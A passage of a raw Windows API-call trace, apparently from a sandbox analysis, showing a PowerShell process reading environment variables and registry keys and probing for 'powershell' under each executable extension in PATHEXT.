	[0676.759] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0676.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.759] CoTaskMemFree (pv=0x1aa380) 
	[0676.760] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0676.760] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16d8c0 | out: lpMode=0x16d8c0) returned 1
	[0676.761] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0676.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.761] CoTaskMemFree (pv=0x1aa380) 
	[0676.763] SetEvent (hEvent=0x2f8) returned 1
	[0676.764] SetEvent (hEvent=0x38c) returned 1
	[0676.764] SetEvent (hEvent=0x324) returned 1
	[0676.764] SetEvent (hEvent=0x2f4) returned 1
	[0676.765] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0676.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.766] CoTaskMemFree (pv=0x1aa380) 
	[0676.766] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d618 | out: phkResult=0x16d618*=0x34c) returned 0x0
	[0676.766] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16d59c, lpData=0x0, lpcbData=0x16d598*=0x0 | out: lpType=0x16d59c*=0x0, lpData=0x0, lpcbData=0x16d598*=0x0) returned 0x2

Thread:
	id = 525
	os_tid = 0x1320


Thread:
	id = 529
	os_tid = 0x1338


Thread:
	id = 936
	os_tid = 0x190c


Thread:
	id = 938
	os_tid = 0x191c


Thread:
	id = 963
	os_tid = 0x19cc


Thread:
	id = 1000
	os_tid = 0x1a94


Thread:
	id = 1007
	os_tid = 0x1abc

	[0526.339] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0618.806] LocalFree (hMem=0x1b7290) returned 0x0
	[0618.806] CloseHandle (hObject=0x314) returned 1
	[0618.806] CloseHandle (hObject=0x13) returned 1
	[0618.807] CloseHandle (hObject=0xf) returned 1
	[0618.807] RegCloseKey (hKey=0x2fc) returned 0x0
	[0618.807] RegCloseKey (hKey=0x2f8) returned 0x0
	[0618.808] RegCloseKey (hKey=0x2f4) returned 0x0
	[0618.808] LocalFree (hMem=0x1b72e0) returned 0x0
	[0618.808] RegCloseKey (hKey=0x324) returned 0x0
	[0628.894] RegCloseKey (hKey=0x2e4) returned 0x0
	[0640.505] RegCloseKey (hKey=0x2e4) returned 0x0
	[0663.260] RegCloseKey (hKey=0x388) returned 0x0
	[0663.261] RegCloseKey (hKey=0x384) returned 0x0
	[0663.261] RegCloseKey (hKey=0x360) returned 0x0
	[0663.261] RegCloseKey (hKey=0x39c) returned 0x0
	[0663.262] RegCloseKey (hKey=0x37c) returned 0x0
	[0663.262] RegCloseKey (hKey=0x378) returned 0x0
	[0663.262] RegCloseKey (hKey=0x374) returned 0x0
	[0663.262] RegCloseKey (hKey=0x370) returned 0x0
	[0663.263] RegCloseKey (hKey=0x36c) returned 0x0
	[0663.263] RegCloseKey (hKey=0x368) returned 0x0
	[0663.263] RegCloseKey (hKey=0x364) returned 0x0
	[0663.264] RegCloseKey (hKey=0x33c) returned 0x0
	[0663.264] RegCloseKey (hKey=0x398) returned 0x0
	[0663.264] RegCloseKey (hKey=0x394) returned 0x0
	[0663.264] RegCloseKey (hKey=0x35c) returned 0x0
	[0663.265] RegCloseKey (hKey=0x358) returned 0x0
	[0663.265] RegCloseKey (hKey=0x354) returned 0x0
	[0663.265] RegCloseKey (hKey=0x350) returned 0x0
	[0663.265] RegCloseKey (hKey=0x34c) returned 0x0
	[0663.266] RegCloseKey (hKey=0x348) returned 0x0
	[0663.266] RegCloseKey (hKey=0x344) returned 0x0
	[0663.266] RegCloseKey (hKey=0x340) returned 0x0
	[0663.267] RegCloseKey (hKey=0x390) returned 0x0
	[0663.267] RegCloseKey (hKey=0x330) returned 0x0
	[0663.267] RegCloseKey (hKey=0x32c) returned 0x0
	[0663.268] RegCloseKey (hKey=0x328) returned 0x0
	[0663.268] RegCloseKey (hKey=0x314) returned 0x0
	[0663.268] RegCloseKey (hKey=0x2fc) returned 0x0
	[0663.269] RegCloseKey (hKey=0x2f8) returned 0x0
	[0663.269] RegCloseKey (hKey=0x2f4) returned 0x0
	[0663.269] RegCloseKey (hKey=0x324) returned 0x0
	[0663.269] RegCloseKey (hKey=0x38c) returned 0x0
	[0663.270] RegCloseKey (hKey=0x2e4) returned 0x0
	[0700.074] RegCloseKey (hKey=0x34c) returned 0x0

Thread:
	id = 1067
	os_tid = 0x146c


Thread:
	id = 1334
	os_tid = 0x1e2c

	[0678.620] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0678.624] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0678.629] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0678.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.629] CoTaskMemFree (pv=0x1aa380) 
	[0678.631] VirtualQuery (in: lpAddress=0x1c83d6c0, lpBuffer=0x1c83e580, dwLength=0x30 | out: lpBuffer=0x1c83e580*(BaseAddress=0x1c83d000, AllocationBase=0x1beb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0678.634] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0678.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.634] CoTaskMemFree (pv=0x1aa380) 
	[0678.637] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0678.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.637] CoTaskMemFree (pv=0x1aa380) 
	[0678.640] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0678.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.641] CoTaskMemFree (pv=0x1aa380) 
	[0678.659] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0678.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.659] CoTaskMemFree (pv=0x1aa380) 
	[0678.662] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0678.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.662] CoTaskMemFree (pv=0x1aa380) 
	[0678.664] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0678.664] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0678.664] CoTaskMemFree (pv=0x1aa380) 
	[0680.416] VirtualQuery (in: lpAddress=0x1c83d970, lpBuffer=0x1c83e830, dwLength=0x30 | out: lpBuffer=0x1c83e830*(BaseAddress=0x1c83d000, AllocationBase=0x1beb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0680.417] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0680.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.417] CoTaskMemFree (pv=0x1aa380) 
	[0680.420] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0680.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.420] CoTaskMemFree (pv=0x1aa380) 
	[0680.420] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0680.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.420] CoTaskMemFree (pv=0x1aa380) 
	[0680.422] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0680.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.422] CoTaskMemFree (pv=0x1aa380) 
	[0680.426] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0680.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0680.426] CoTaskMemFree (pv=0x1aa380) 
	[0681.846] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0681.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.847] CoTaskMemFree (pv=0x1aa380) 
	[0681.849] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0681.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.849] CoTaskMemFree (pv=0x1aa380) 
	[0681.851] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0681.851] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.851] CoTaskMemFree (pv=0x1aa380) 
	[0681.854] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0681.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.854] CoTaskMemFree (pv=0x1aa380) 
	[0681.856] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0681.856] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.856] CoTaskMemFree (pv=0x1aa380) 
	[0681.858] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0681.858] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.858] CoTaskMemFree (pv=0x1aa380) 
	[0681.859] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0681.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0681.860] CoTaskMemFree (pv=0x1aa380) 
	[0683.506] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0683.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0683.506] CoTaskMemFree (pv=0x1aa380) 
	[0686.305] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0686.306] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0686.306] CoTaskMemFree (pv=0x1aa380) 
	[0688.235] CoTaskMemAlloc (cb=0x104) returned 0x1aa380
	[0688.235] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1aa380, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0688.235] CoTaskMemFree (pv=0x1aa380) 
	[0688.235] CoTaskMemAlloc (cb=0x128) returned 0x1b85d8b0
	[0688.235] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b85d8b0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0688.236] CoTaskMemFree (pv=0x1b85d8b0) 
	[0688.240] CoTaskMemAlloc (cb=0x20e) returned 0x1b8595e0
	[0688.241] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8595e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0688.241] CoTaskMemFree (pv=0x1b8595e0) 
	[0688.245] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0688.246] SetErrorMode (uMode=0x1) returned 0x1
	[0688.249] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0688.260] SetErrorMode (uMode=0x1) returned 0x1
	[0688.262] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0688.262] SetErrorMode (uMode=0x1) returned 0x1
	[0688.262] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0688.273] SetErrorMode (uMode=0x1) returned 0x1
	[0688.274] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0688.274] SetErrorMode (uMode=0x1) returned 0x1
	[0688.275] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0689.704] SetErrorMode (uMode=0x1) returned 0x1
	[0689.706] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0689.706] SetErrorMode (uMode=0x1) returned 0x1
	[0689.706] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0689.714] SetErrorMode (uMode=0x1) returned 0x1
	[0689.716] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0689.716] SetErrorMode (uMode=0x1) returned 0x1
	[0689.716] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0689.724] SetErrorMode (uMode=0x1) returned 0x1
	[0689.725] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0689.726] SetErrorMode (uMode=0x1) returned 0x1
	[0689.726] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0689.734] SetErrorMode (uMode=0x1) returned 0x1
	[0689.735] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0689.736] SetErrorMode (uMode=0x1) returned 0x1
	[0689.736] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0691.694] SetErrorMode (uMode=0x1) returned 0x1
	[0691.696] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0691.696] SetErrorMode (uMode=0x1) returned 0x1
	[0691.696] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0691.704] SetErrorMode (uMode=0x1) returned 0x1
	[0691.705] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0691.706] SetErrorMode (uMode=0x1) returned 0x1
	[0691.706] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0691.714] SetErrorMode (uMode=0x1) returned 0x1
	[0691.715] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0691.716] SetErrorMode (uMode=0x1) returned 0x1
	[0691.716] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0691.724] SetErrorMode (uMode=0x1) returned 0x1
	[0691.725] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0691.725] SetErrorMode (uMode=0x1) returned 0x1
	[0691.725] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0691.734] SetErrorMode (uMode=0x1) returned 0x1
	[0691.735] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0691.735] SetErrorMode (uMode=0x1) returned 0x1
	[0691.735] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.484] SetErrorMode (uMode=0x1) returned 0x1
	[0693.485] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0693.485] SetErrorMode (uMode=0x1) returned 0x1
	[0693.485] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.494] SetErrorMode (uMode=0x1) returned 0x1
	[0693.495] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0693.495] SetErrorMode (uMode=0x1) returned 0x1
	[0693.495] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.504] SetErrorMode (uMode=0x1) returned 0x1
	[0693.505] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0693.506] SetErrorMode (uMode=0x1) returned 0x1
